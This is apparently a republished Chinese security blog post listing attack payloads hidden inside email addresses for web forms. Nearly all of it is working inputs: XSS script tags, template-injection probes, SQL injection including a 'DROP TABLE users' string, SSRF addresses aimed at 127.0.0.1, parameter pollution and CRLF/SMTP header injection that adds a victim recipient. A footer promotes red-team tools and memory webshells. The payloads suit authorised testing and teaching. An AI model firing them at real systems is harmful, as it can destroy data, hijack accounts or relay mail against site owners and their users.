Sqli学习笔记系列-遇到与邮箱相关的功能的测试思路(payload)
2023-3-22 09:12:15 Author: 系统安全运维(查看原文) 阅读量:17 收藏

Sqli学习笔记系列-遇到与邮箱相关的功能的测试思路(payload)

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

主要测试思路

  • xss:
test+(<script>alter(0)</script>)@example.com
[email protected](<script>alter(0)</script>).com
"<script>alter(0)</script>"@example.com
  • 模板注入:
"<%= 7 * 7>"@example.com
test+(${{7*7}})@example.com
  • SQLi
"'OR1=1--'"@example.com
"mail);DROP TABLE users;--"@example.com
  • SSRF
[email protected]
[email protected][127.0.0.1]
  • 参数污染
victim&[email protected]
  • Header注入

"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247518804&idx=2&sn=b27cb2c3f66b54a810074a90b4853fbf&chksm=c3085924f47fd0322001e254663703aa5448ecd7eb14ea59c8bf6bb1651b30725386c2403285#rd
如有侵权请联系:admin#unsafe.sh